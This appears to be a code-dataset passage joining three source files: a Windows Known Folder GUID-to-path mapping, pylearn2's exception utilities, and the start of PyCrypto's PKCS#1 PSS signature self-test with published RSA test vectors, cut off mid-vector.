u'4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4': u'Saved Games',
u'4d9f7874-4e0c-4904-967b-40b0d20c3e4b': u'Internet (The Internet)',
u'52528a6b-b9e3-4add-b60d-588c2dba842d': u'Homegroup',
u'52a4f021-7b75-48a9-9f6b-4b87a210bc8f': u'Quick Launch',
u'56784854-c6cb-462b-8169-88e350acb882': u'Contacts',
u'5b3749ad-b49f-49c1-83eb-15370fbd4882': u'Tree Properties',
u'5cd7aee2-2219-4a67-b85d-6c9ce15660cb': u'Programs',
u'5ce4a5e9-e4eb-479d-b89f-130c02886155': u'Device Metadata Store',
u'5e6c858f-0e22-4760-9afe-ea3317b67173': u'Profile (User\'s name)',
u'625b53c3-ab48-4ec1-ba1f-a1ef4146fc19': u'Start Menu',
u'62ab5d82-fdc1-4dc3-a9dd-070d1d495d97': u'Program Data',
u'6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d': u'Common Files (x64)',
u'69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c': u'Slide Shows (Photo Albums)',
u'6d809377-6af0-444b-8957-a3773f02200e': u'Program Files (x64)',
u'6f0cd92b-2e97-45d1-88ff-b0d186b8dedd': u'Network Connections',
u'724ef170-a42d-4fef-9f26-b60e846fba4f': u'Administrative Tools',
u'767e6811-49cb-4273-87c2-20f355e1085b': u'One Drive Camera Roll',
u'76fc4e2d-d6ad-4519-a663-37bd56068185': u'Printers',
u'7b0db17d-9cd2-4a93-9733-46cc89022e7c': u'Documents',
u'7b396e54-9ec5-4300-be0a-2482ebae1a26': u'Default Gadgets (Sidebar Default Parts)',
u'7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e': u'Program Files (x86)',
u'7d1d3a04-debb-4115-95cf-2f29da2920da': u'Saved Searches (Searches)',
u'7e636bfe-dfa9-4d5e-b456-d7b39851d8a9': u'Templates',
u'82a5ea35-d9cd-47c5-9629-e15d2f714e6e': u'(Common) Startup',
u'82a74aeb-aeb4-465c-a014-d097ee346d63': u'Control Panel',
u'859ead94-2e85-48ad-a71a-0969cb56a6cd': u'Sample Videos',
u'8983036c-27c0-404b-8f08-102d10dcfd74': u'Send To',
u'8ad10c31-2adb-4296-a8f7-e4701232c972': u'Resources (Resources Directory)',
u'905e63b6-c1bf-494e-b29c-65b732d3d21a': u'Program Files',
u'9274bd8d-cfd1-41c3-b35e-b13f55a758f4': u'Printer Shortcuts (PrintHood)',
u'98ec0e18-2098-4d44-8644-66979315a281': u'Microsoft Office Outlook (MAPI)',
u'9b74b6a3-0dfd-4f11-9e78-5f7800f2e772': u'User\'s name',
u'9e3995ab-1f9c-4f13-b827-48b24b6c7174': u'User Pinned',
u'9e52ab10-f80d-49df-acb8-4330f5687855': u'Temporary Burn Folder (CD Burning)',
u'a302545d-deff-464b-abe8-61c8648d939b': u'Libraries',
u'a305ce99-f527-492b-8b1a-7e76fa98d6e4': u'Installed Updates (Application Updates)',
u'a3918781-e5f2-4890-b3d9-a7e54332328c': u'Application Shortcuts',
u'a4115719-d62e-491d-aa7c-e74b8be3b067': u'(Common) Start Menu',
u'a520a1a4-1780-4ff6-bd18-167343c5af16': u'Local Application Data Low (Local Low)',
u'a52bba46-e9e1-435f-b3d9-28daa648c0f6': u'One Drive',
u'a63293e8-664e-48db-a079-df759e0509f7': u'Templates',
u'a75d362e-50fc-4fb7-ac2c-a8beaa314493': u'Gadgets (Sidebar Parts)',
u'a77f5d77-2e2b-44c3-a6a2-aba601054a51': u'Programs',
u'a990ae9f-a03b-4e80-94bc-9912d7504104': u'Pictures',
u'aaa8d5a5-f1d6-4259-baa8-78e7ef60835e': u'Roamed Tile Images',
u'ab5fb87b-7ce2-4f83-915d-550846c9537b': u'Camera Roll',
u'ae50c081-ebd2-438a-8655-8a092e34987a': u'Recent (Recent Items)',
u'b250c668-f57d-4ee1-a63c-290ee7d1aa1f': u'Sample Music',
u'b4bfcc3a-db2c-424c-b029-7fe99a87c641': u'Desktop',
u'b6ebfb86-6907-413c-9af7-4fc2abf07cc5': u'Public Pictures (Common Pictures)',
u'b7534046-3ecb-4c18-be4e-64cd4cb7d6ac': u'Recycle Bin (Bit Bucket)',
u'b7bede81-df94-4682-a7d8-57a52620b86f': u'Screenshots',
u'b94237e7-57ac-4347-9151-b08c6c32d1f7': u'(Common) Templates',
u'b97d20bb-f46a-4c97-ba10-5e3608430854': u'Startup',
u'bcb5256f-79f6-4cee-b725-dc34e402fd46': u'Implicit Application Shortcuts',
u'bcbd3057-ca5c-4622-b42d-bc56db0ae516': u'Programs',
u'bd85e001-112e-431e-983b-7b15ac09fff1': u'Recorded TV',
u'bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968': u'Links',
u'c1bae2d0-10df-4334-bedd-7aa20b227a9d': u'(Common) OEM Links',
u'c4900540-2379-4c75-844b-64e6faf8716b': u'Sample Pictures',
u'c4aa340d-f20f-4863-afef-f87ef2e6ba25': u'Public Desktop (Common Desktop)',
u'c5abbf53-e17f-4121-8900-86626fc2c973': u'Network Shortcuts (NetHood)',
u'c870044b-f49e-4126-a9c3-b52a1ff411e8': u'Ringtones',
u'cac52c1a-b53d-4edc-92d7-6b2e8ac19434': u'Games',
u'd0384e7d-bac3-4797-8f14-cba229b392b5': u'(Common) Administrative Tools',
u'd20beec4-5ca8-4905-ae3b-bf251ea09b53': u'Network (Places)',
u'd65231b0-b2f1-4857-a4ce-a8e7c6ea7d27': u'System32 (x86)',
u'd9dc8a3b-b784-432e-a781-5a1130a75963': u'History',
u'de61d971-5ebc-4f02-a3a9-6c82895e5c04': u'Add New Programs (Get Programs)',
u'de92c1c7-837f-4f69-a3bb-86e631204a23': u'Playlists',
u'de974d24-d9c6-4d3e-bf91-f4455120b917': u'Common Files (x86)',
u'debf2536-e1a8-4c59-b6a2-414586476aea': u'Game Explorer (Public Game Tasks)',
u'df7266ac-9274-4867-8d55-3bd661de872d': u'Programs and Features (Change and Remove Programs)',
u'dfdf76a2-c82a-4d63-906a-5644ac457385': u'Public',
u'e555ab60-153b-4d17-9f04-a5fe99fc15ec': u'Ringtones',
u'ed4824af-dce4-45a8-81e2-fc7965083634': u'Public Documents (Common Documents)',
u'ee32e446-31ca-4aba-814f-a5ebd2fd6d5e': u'Offline Files (CSC)',
u'f1b32785-6fba-4fcf-9d55-7b8e7f157091': u'Local Application Data',
u'f38bf404-1d43-42f2-9305-67de0b28fc23': u'Windows',
u'f3ce0f7c-4901-4acc-8648-d5d44b04ef8f': u'User\'s Files',
u'f7f1ed05-9f6d-47a2-aaae-29d317c6f066': u'Common Files',
u'fd228cb7-ae11-4ae3-864c-16f3910ab8fe': u'Fonts',
u'fdd39ad0-238f-46af-adb4-6c85480369c7': u'Documents (Personal)',
}
PATHS = {
u'008ca0b1-55b4-4c56-b8a8-4de4b299d3be': u'%APPDATA%\\Microsoft\\Windows\\AccountPictures',
u'00bcfc5a-ed94-4e48-96a1-3f6217f21990': u'%LOCALAPPDATA%\\Microsoft\\Windows\\RoamingTiles',
u'0139d44e-6afe-49f2-8690-3dafcae6ffb8': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs',
u'0482af6c-08f1-4c34-8c90-e17ec98b1e17': u'%PUBLIC%\\AccountPictures',
u'054fae61-4dd8-4787-80b6-090220c4b700': u'%LOCALAPPDATA%\\Microsoft\\Windows\\GameExplorer',
u'0762d272-c50a-4bb0-a382-697dcd729b80': u'%SYSTEMDRIVE%\\Users',
u'0ac0837c-bbf8-452a-850d-79d08e667ca7': u'',
u'0d4c3db6-03a3-462f-a0e6-08924c41b5d4': u'%LOCALAPPDATA%\\Microsoft\\Windows\\ConnectedSearch\\History',
u'0f214138-b1d3-4a90-bba9-27cbc0c5389a': u'',
u'15ca69b3-30ee-49c1-ace1-6b5ec372afb5': u'%PUBLIC%\\Music\\Sample Playlists',
u'1777f761-68ad-4d8a-87bd-30b759fa33dd': u'%USERPROFILE%\\Favorites',
u'18989b1d-99b5-455b-841c-ab7c74e4ddfc': u'%USERPROFILE%\\Videos',
u'190337d1-b8ca-4121-a639-6d472d16972a': u'',
u'1a6fdba2-f42d-4358-a798-b74d745926c5': u'%PUBLIC%\\RecordedTV.library-ms',
u'1ac14e77-02e7-4e5d-b744-2eb1ae5198b7': u'%WINDIR%\\System32',
u'1b3ea5dc-b587-4786-b4ef-bd1dc332aeae': u'%APPDATA%\\Microsoft\\Windows\\Libraries',
u'1e87508d-89c2-42f0-8a7e-645a0f50ca58': u'',
u'2112ab0a-c86a-4ffe-a368-0de96e47012e': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Music.library-ms',
u'2400183a-6185-49fb-a2d8-4a392a602ba3': u'%PUBLIC%\\Videos',
u'24d89e24-2f19-4534-9dde-6a6671fbb8fe': u'%USERPROFILE%\\OneDrive\\Documents',
u'289a9a43-be44-4057-a41b-587a76d7e7f9': u'',
u'2a00375e-224c-49de-b8d1-440df7ef3ddc': u'%WINDIR%\\resources\\%CODEPAGE%',
u'2b0f765d-c0e9-4171-908e-08a611b84ff6': u'%APPDATA%\\Microsoft\\Windows\\Cookies',
u'2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39': u'%LOCALAPPDATA%\\Microsoft\\Windows Photo Gallery\\Original Images',
u'3214fab5-9757-4298-bb61-92a9deaa44ff': u'%PUBLIC%\\Music',
u'339719b5-8c47-4894-94c2-d8f77add44a6': u'%USERPROFILE%\\OneDrive\\Pictures',
u'33e28130-4e1e-4676-835a-98395c3bc3bb': u'%USERPROFILE%\\Pictures',
u'352481e8-33be-4251-ba85-6007caedcf9d': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files',
u'374de290-123f-4565-9164-39c4925e467b': u'%USERPROFILE%\\Downloads',
u'3d644c9b-1fb8-4f30-9b45-f670235f79c0': u'%PUBLIC%\\Downloads',
u'3eb685db-65f9-4cf6-a03a-e3ef65729f3d': u'%USERPROFILE%\\AppData\\Roaming',
u'43668bf8-c14e-49b2-97c9-747784d784b7': u'',
u'48daf80b-e6cf-4f4e-b800-0e69d84ee384': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Libraries',
u'491e922f-5643-4af4-a7eb-4e7a138d8174': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Videos.library-ms',
u'4bd8d571-6d19-48d3-be97-422220080e43': u'%USERPROFILE%\\Music',
u'4bfefb45-347d-4006-a5be-ac0cb0567192': u'',
u'4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4': u'%USERPROFILE%\\Saved Games',
u'4d9f7874-4e0c-4904-967b-40b0d20c3e4b': u'',
u'52528a6b-b9e3-4add-b60d-588c2dba842d': u'',
u'52a4f021-7b75-48a9-9f6b-4b87a210bc8f': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch',
u'56784854-c6cb-462b-8169-88e350acb882': u'',
u'5b3749ad-b49f-49c1-83eb-15370fbd4882': u'',
u'5cd7aee2-2219-4a67-b85d-6c9ce15660cb': u'%LOCALAPPDATA%\\Programs',
u'5ce4a5e9-e4eb-479d-b89f-130c02886155': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\DeviceMetadataStore',
u'5e6c858f-0e22-4760-9afe-ea3317b67173': u'%SYSTEMDRIVE%\\Users\\%USERNAME%',
u'625b53c3-ab48-4ec1-ba1f-a1ef4146fc19': u'%APPDATA%\\Microsoft\\Windows\\Start Menu',
u'62ab5d82-fdc1-4dc3-a9dd-070d1d495d97': u'%SYSTEMDRIVE%\\ProgramData',
u'6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d': u'%PROGRAMFILES%\\Common Files',
u'69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c': u'%USERPROFILE%\\Pictures\\Slide Shows',
u'6d809377-6af0-444b-8957-a3773f02200e': u'%SYSTEMDRIVE%\\Program Files',
u'6f0cd92b-2e97-45d1-88ff-b0d186b8dedd': u'',
u'724ef170-a42d-4fef-9f26-b60e846fba4f': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools',
u'767e6811-49cb-4273-87c2-20f355e1085b': u'%USERPROFILE%\\OneDrive\\Pictures\\Camera Roll',
u'76fc4e2d-d6ad-4519-a663-37bd56068185': u'',
u'7b0db17d-9cd2-4a93-9733-46cc89022e7c': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Documents.library-ms',
u'7b396e54-9ec5-4300-be0a-2482ebae1a26': u'%PROGRAMFILES%\\Windows Sidebar\\Gadgets',
u'7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e': u'%PROGRAMFILES% (%SYSTEMDRIVE%\\Program Files)',
u'7d1d3a04-debb-4115-95cf-2f29da2920da': u'%USERPROFILE%\\Searches',
u'7e636bfe-dfa9-4d5e-b456-d7b39851d8a9': u'%LOCALAPPDATA%\\Microsoft\\Windows\\ConnectedSearch\\Templates',
u'82a5ea35-d9cd-47c5-9629-e15d2f714e6e': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp',
u'82a74aeb-aeb4-465c-a014-d097ee346d63': u'',
u'859ead94-2e85-48ad-a71a-0969cb56a6cd': u'%PUBLIC%\\Videos\\Sample Videos',
u'8983036c-27c0-404b-8f08-102d10dcfd74': u'%APPDATA%\\Microsoft\\Windows\\SendTo',
u'8ad10c31-2adb-4296-a8f7-e4701232c972': u'%WINDIR%\\Resources',
u'905e63b6-c1bf-494e-b29c-65b732d3d21a': u'%SYSTEMDRIVE%\\Program Files',
u'9274bd8d-cfd1-41c3-b35e-b13f55a758f4': u'%APPDATA%\\Microsoft\\Windows\\Printer Shortcuts',
u'98ec0e18-2098-4d44-8644-66979315a281': u'',
u'9b74b6a3-0dfd-4f11-9e78-5f7800f2e772': u'',
u'9e3995ab-1f9c-4f13-b827-48b24b6c7174': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned',
u'9e52ab10-f80d-49df-acb8-4330f5687855': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Burn\\Burn',
u'a302545d-deff-464b-abe8-61c8648d939b': u'',
u'a305ce99-f527-492b-8b1a-7e76fa98d6e4': u'',
u'a3918781-e5f2-4890-b3d9-a7e54332328c': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Application Shortcuts',
u'a4115719-d62e-491d-aa7c-e74b8be3b067': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu',
u'a520a1a4-1780-4ff6-bd18-167343c5af16': u'%USERPROFILE%\\AppData\\LocalLow',
u'a52bba46-e9e1-435f-b3d9-28daa648c0f6': u'%USERPROFILE%\\OneDrive',
u'a63293e8-664e-48db-a079-df759e0509f7': u'%APPDATA%\\Microsoft\\Windows\\Templates',
u'a75d362e-50fc-4fb7-ac2c-a8beaa314493': u'%LOCALAPPDATA%\\Microsoft\\Windows Sidebar\\Gadgets',
u'a77f5d77-2e2b-44c3-a6a2-aba601054a51': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs',
u'a990ae9f-a03b-4e80-94bc-9912d7504104': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Pictures.library-ms',
u'aaa8d5a5-f1d6-4259-baa8-78e7ef60835e': u'%LOCALAPPDATA%\\Microsoft\\Windows\\RoamedTileImages',
u'ab5fb87b-7ce2-4f83-915d-550846c9537b': u'%USERPROFILE%\\Pictures\\Camera Roll',
u'ae50c081-ebd2-438a-8655-8a092e34987a': u'%APPDATA%\\Microsoft\\Windows\\Recent',
u'b250c668-f57d-4ee1-a63c-290ee7d1aa1f': u'%PUBLIC%\\Music\\Sample Music',
u'b4bfcc3a-db2c-424c-b029-7fe99a87c641': u'%USERPROFILE%\\Desktop',
u'b6ebfb86-6907-413c-9af7-4fc2abf07cc5': u'%PUBLIC%\\Pictures',
u'b7534046-3ecb-4c18-be4e-64cd4cb7d6ac': u'',
u'b7bede81-df94-4682-a7d8-57a52620b86f': u'%USERPROFILE%\\Pictures\\Screenshots',
u'b94237e7-57ac-4347-9151-b08c6c32d1f7': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Templates',
u'b97d20bb-f46a-4c97-ba10-5e3608430854': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp',
u'bcb5256f-79f6-4cee-b725-dc34e402fd46': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts',
u'bcbd3057-ca5c-4622-b42d-bc56db0ae516': u'%LOCALAPPDATA%\\Programs\\Common',
u'bd85e001-112e-431e-983b-7b15ac09fff1': u'',
u'bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968': u'%USERPROFILE%\\Links',
u'c1bae2d0-10df-4334-bedd-7aa20b227a9d': u'%ALLUSERSPROFILE%\\OEM Links',
u'c4900540-2379-4c75-844b-64e6faf8716b': u'%PUBLIC%\\Pictures\\Sample Pictures',
u'c4aa340d-f20f-4863-afef-f87ef2e6ba25': u'%PUBLIC%\\Desktop',
u'c5abbf53-e17f-4121-8900-86626fc2c973': u'%APPDATA%\\Microsoft\\Windows\\Network Shortcuts',
u'c870044b-f49e-4126-a9c3-b52a1ff411e8': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Ringtones',
u'cac52c1a-b53d-4edc-92d7-6b2e8ac19434': u'',
u'd0384e7d-bac3-4797-8f14-cba229b392b5': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools',
u'd20beec4-5ca8-4905-ae3b-bf251ea09b53': u'',
u'd65231b0-b2f1-4857-a4ce-a8e7c6ea7d27': u'%WINDIR%\\system32',
u'd9dc8a3b-b784-432e-a781-5a1130a75963': u'%LOCALAPPDATA%\\Microsoft\\Windows\\History',
u'de61d971-5ebc-4f02-a3a9-6c82895e5c04': u'',
u'de92c1c7-837f-4f69-a3bb-86e631204a23': u'%USERPROFILE%\\Music\\Playlists',
u'de974d24-d9c6-4d3e-bf91-f4455120b917': u'%PROGRAMFILES%\\Common Files',
u'debf2536-e1a8-4c59-b6a2-414586476aea': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\GameExplorer',
u'df7266ac-9274-4867-8d55-3bd661de872d': u'',
u'dfdf76a2-c82a-4d63-906a-5644ac457385': u'%SYSTEMDRIVE%\\Users\\Public',
u'e555ab60-153b-4d17-9f04-a5fe99fc15ec': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Ringtones',
u'ed4824af-dce4-45a8-81e2-fc7965083634': u'%PUBLIC%\\Documents',
u'ee32e446-31ca-4aba-814f-a5ebd2fd6d5e': u'',
u'f1b32785-6fba-4fcf-9d55-7b8e7f157091': u'%USERPROFILE%\\AppData\\Local',
u'f38bf404-1d43-42f2-9305-67de0b28fc23': u'%WINDIR%',
u'f3ce0f7c-4901-4acc-8648-d5d44b04ef8f': u'',
u'f7f1ed05-9f6d-47a2-aaae-29d317c6f066': u'%PROGRAMFILES%\\Common Files',
u'fd228cb7-ae11-4ae3-864c-16f3910ab8fe': u'%WINDIR%\\Fonts',
u'fdd39ad0-238f-46af-adb4-6c85480369c7': u'%USERPROFILE%\\Documents',
}
| apache-2.0 |
w1kke/pylearn2 | pylearn2/utils/exc.py | 7 | 2984 | """Exceptions used by basic support utilities."""
__author__ = "Ian Goodfellow"
import inspect
import sys
import textwrap
from pylearn2.utils.common_strings import environment_variable_essay
from theano.compat import six
class EnvironmentVariableError(Exception):
    """
    An exception raised when a required environment variable is not defined.
    """
    # The original defined an __init__ that only forwarded *args to
    # Exception.__init__; that override added nothing, so the inherited
    # constructor is used directly.  Behaviour is unchanged.
# This exception is here as string_utils need it and setting it in
# datasets.exc would create a circular import.
class NoDataPathError(EnvironmentVariableError):
    """
    Exception raised when PYLEARN2_DATA_PATH is required but has not been
    defined.
    """
    def __init__(self):
        """
        Build the error message by concatenating the module-level
        ``data_path_essay`` with the shared ``environment_variable_essay``.
        Takes no arguments: the message is always the same.
        """
        super(NoDataPathError, self).__init__(data_path_essay +
                                              environment_variable_essay)
# Guidance text shown to the user when PYLEARN2_DATA_PATH is missing; it is
# prepended to environment_variable_essay by NoDataPathError above.
data_path_essay = """\
You need to define your PYLEARN2_DATA_PATH environment variable. If you are
using a computer at LISA, this should be set to /data/lisa/data.
"""
def reraise_as(new_exc):
    """
    Reraise the exception currently being handled as *new_exc*, folding the
    original exception's message and type into the new message and keeping
    the original traceback.

    Parameters
    ----------
    new_exc : Exception isinstance
        The new error to be raised e.g. (ValueError("New message"))
        or a string that will be prepended to the original exception
        message

    Notes
    -----
    Note that when reraising exceptions, the arguments of the original
    exception are cast to strings and appended to the error message. If
    you want to retain the original exception arguments, please use:

    >>> except Exception as e:
    >>>     reraise_as(NewException("Extra information", *e.args))

    Examples
    --------
    >>> try:
    >>>     do_something_crazy()
    >>> except Exception:
    >>>     reraise_as(UnhandledException("Informative message"))
    """
    # Must be called from inside an ``except`` block: this reads the
    # exception currently being handled.
    orig_exc_type, orig_exc_value, orig_exc_traceback = sys.exc_info()

    # A bare string is promoted to an exception of the *original* type.
    if isinstance(new_exc, six.string_types):
        new_exc = orig_exc_type(new_exc)

    if hasattr(new_exc, 'args'):
        if len(new_exc.args) > 0:
            # We add all the arguments to the message, to make sure that this
            # information isn't lost if this exception is reraised again
            new_message = ', '.join(str(arg) for arg in new_exc.args)
        else:
            new_message = ""
        new_message += '\n\nOriginal exception:\n\t' + orig_exc_type.__name__
        if hasattr(orig_exc_value, 'args') and len(orig_exc_value.args) > 0:
            if getattr(orig_exc_value, 'reraised', False):
                # Exceptions produced by an earlier reraise_as already carry
                # their full history in args[0]; only that is appended.
                new_message += ': ' + str(orig_exc_value.args[0])
            else:
                new_message += ': ' + ', '.join(str(arg)
                                                for arg in orig_exc_value.args)
        new_exc.args = (new_message,) + new_exc.args[1:]

    # Preserve the causal chain (PEP 3134) and mark the new exception so a
    # later reraise_as call can detect it via the ``reraised`` flag above.
    new_exc.__cause__ = orig_exc_value
    new_exc.reraised = True
    six.reraise(type(new_exc), new_exc, orig_exc_traceback)
| bsd-3-clause |
kieferbonk/xbmc-finnish-tv | plugin.video.yleareena/osx/Crypto/SelfTest/Signature/test_pkcs1_pss.py | 113 | 20598 | # -*- coding: utf-8 -*-
#
# SelfTest/Signature/test_pkcs1_pss.py: Self-test for PKCS#1 PSS signatures
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
from __future__ import nested_scopes
__revision__ = "$Id$"
import unittest
from Crypto.PublicKey import RSA
from Crypto import Random
from Crypto.SelfTest.st_common import list_test_cases, a2b_hex, b2a_hex
from Crypto.Hash import *
from Crypto.Signature import PKCS1_PSS as PKCS
from Crypto.Util.py3compat import *
def isStr(s):
    """Return 1 if *s* can be concatenated to a text string, else 0."""
    try:
        '' + s
    except TypeError:
        return 0
    return 1
def rws(t):
    """Strip every tab, newline and space character out of *t*."""
    return t.replace('\t', '').replace('\n', '').replace(' ', '')
def t2b(t):
    """Convert a text string with bytes in hex form to a byte string"""
    compact = b(rws(t))
    if len(compact) % 2 != 0:
        raise ValueError("Even number of characters expected")
    return a2b_hex(compact)
# Wrapper around an RSA key object that records how many bytes the signing
# code pulls from the key's private RNG (bytes used for blinding excluded).
class MyKey:
    def __init__(self, key):
        self._key = key
        self.n = key.n
        # Running total of RNG bytes requested through _randfunc.
        self.asked = 0

    def _randfunc(self, howmany):
        self.asked = self.asked + howmany
        return self._key._randfunc(howmany)

    # The remaining methods simply delegate to the wrapped key.
    def has_private(self):
        return self._key.has_private()

    def sign(self, m):
        return self._key.sign(m)

    def verify(self, m, p):
        return self._key.verify(m, p)

    def decrypt(self, m):
        return self._key.decrypt(m)

    def encrypt(self, m, p):
        return self._key.encrypt(m, p)
class PKCS1_PSS_Tests(unittest.TestCase):
    """Known-answer and behavioural self-tests for PKCS#1 PSS signatures."""

    # List of tuples with test data for PKCS#1 PSS
    # Each tuple is made up by:
    #   Item #0: dictionary with RSA key component, or key to import
    #   Item #1: data to hash and sign
    #   Item #2: signature of the data #1, done with the key #0,
    #            and salt #3 after hashing it with #4
    #   Item #3: salt
    #   Item #4: hash object generator
    _testData = (

        #
        # From in pss-vect.txt to be found in
        # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
        #
        (
            # Private key
            {
                'n': '''a2 ba 40 ee 07 e3 b2 bd 2f 02 ce 22 7f 36 a1 95
                02 44 86 e4 9c 19 cb 41 bb bd fb ba 98 b2 2b 0e
                57 7c 2e ea ff a2 0d 88 3a 76 e6 5e 39 4c 69 d4
                b3 c0 5a 1e 8f ad da 27 ed b2 a4 2b c0 00 fe 88
                8b 9b 32 c2 2d 15 ad d0 cd 76 b3 e7 93 6e 19 95
                5b 22 0d d1 7d 4e a9 04 b1 ec 10 2b 2e 4d e7 75
                12 22 aa 99 15 10 24 c7 cb 41 cc 5e a2 1d 00 ee
                b4 1f 7c 80 08 34 d2 c6 e0 6b ce 3b ce 7e a9 a5''',
                'e': '''01 00 01''',
                # In the test vector, only p and q were given...
                # d is computed offline as e^{-1} mod (p-1)(q-1)
                'd': '''50e2c3e38d886110288dfc68a9533e7e12e27d2aa56
                d2cdb3fb6efa990bcff29e1d2987fb711962860e7391b1ce01
                ebadb9e812d2fbdfaf25df4ae26110a6d7a26f0b810f54875e
                17dd5c9fb6d641761245b81e79f8c88f0e55a6dcd5f133abd3
                5f8f4ec80adf1bf86277a582894cb6ebcd2162f1c7534f1f49
                47b129151b71'''
            },
            # Data to sign
            '''85 9e ef 2f d7 8a ca 00 30 8b dc 47 11 93 bf 55
            bf 9d 78 db 8f 8a 67 2b 48 46 34 f3 c9 c2 6e 64
            78 ae 10 26 0f e0 dd 8c 08 2e 53 a5 29 3a f2 17
            3c d5 0c 6d 5d 35 4f eb f7 8b 26 02 1c 25 c0 27
            12 e7 8c d4 69 4c 9f 46 97 77 e4 51 e7 f8 e9 e0
            4c d3 73 9c 6b bf ed ae 48 7f b5 56 44 e9 ca 74
            ff 77 a5 3c b7 29 80 2f 6e d4 a5 ff a8 ba 15 98
            90 fc''',
            # Signature
            '''8d aa 62 7d 3d e7 59 5d 63 05 6c 7e c6 59 e5 44
            06 f1 06 10 12 8b aa e8 21 c8 b2 a0 f3 93 6d 54
            dc 3b dc e4 66 89 f6 b7 95 1b b1 8e 84 05 42 76
            97 18 d5 71 5d 21 0d 85 ef bb 59 61 92 03 2c 42
            be 4c 29 97 2c 85 62 75 eb 6d 5a 45 f0 5f 51 87
            6f c6 74 3d ed dd 28 ca ec 9b b3 0e a9 9e 02 c3
            48 82 69 60 4f e4 97 f7 4c cd 7c 7f ca 16 71 89
            71 23 cb d3 0d ef 5d 54 a2 b5 53 6a d9 0a 74 7e''',
            # Salt
            '''e3 b5 d5 d0 02 c1 bc e5 0c 2b 65 ef 88 a1 88 d8
            3b ce 7e 61''',
            # Hash algorithm
            SHA
        ),

        #
        # Example 1.1 to be found in
        # ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
        #
        (
            # Private key
            {
                'n': '''a5 6e 4a 0e 70 10 17 58 9a 51 87 dc 7e a8 41 d1
                56 f2 ec 0e 36 ad 52 a4 4d fe b1 e6 1f 7a d9 91
                d8 c5 10 56 ff ed b1 62 b4 c0 f2 83 a1 2a 88 a3
                94 df f5 26 ab 72 91 cb b3 07 ce ab fc e0 b1 df
                d5 cd 95 08 09 6d 5b 2b 8b 6d f5 d6 71 ef 63 77
                c0 92 1c b2 3c 27 0a 70 e2 59 8e 6f f8 9d 19 f1
                05 ac c2 d3 f0 cb 35 f2 92 80 e1 38 6b 6f 64 c4
                ef 22 e1 e1 f2 0d 0c e8 cf fb 22 49 bd 9a 21 37''',
                'e': '''01 00 01''',
                'd': '''33 a5 04 2a 90 b2 7d 4f 54 51 ca 9b bb d0 b4 47
                71 a1 01 af 88 43 40 ae f9 88 5f 2a 4b be 92 e8
                94 a7 24 ac 3c 56 8c 8f 97 85 3a d0 7c 02 66 c8
                c6 a3 ca 09 29 f1 e8 f1 12 31 88 44 29 fc 4d 9a
                e5 5f ee 89 6a 10 ce 70 7c 3e d7 e7 34 e4 47 27
                a3 95 74 50 1a 53 26 83 10 9c 2a ba ca ba 28 3c
                31 b4 bd 2f 53 c3 ee 37 e3 52 ce e3 4f 9e 50 3b
                d8 0c 06 22 ad 79 c6 dc ee 88 35 47 c6 a3 b3 25'''
            },
            # Message
            '''cd c8 7d a2 23 d7 86 df 3b 45 e0 bb bc 72 13 26
            d1 ee 2a f8 06 cc 31 54 75 cc 6f 0d 9c 66 e1 b6
            23 71 d4 5c e2 39 2e 1a c9 28 44 c3 10 10 2f 15
            6a 0d 8d 52 c1 f4 c4 0b a3 aa 65 09 57 86 cb 76
            97 57 a6 56 3b a9 58 fe d0 bc c9 84 e8 b5 17 a3
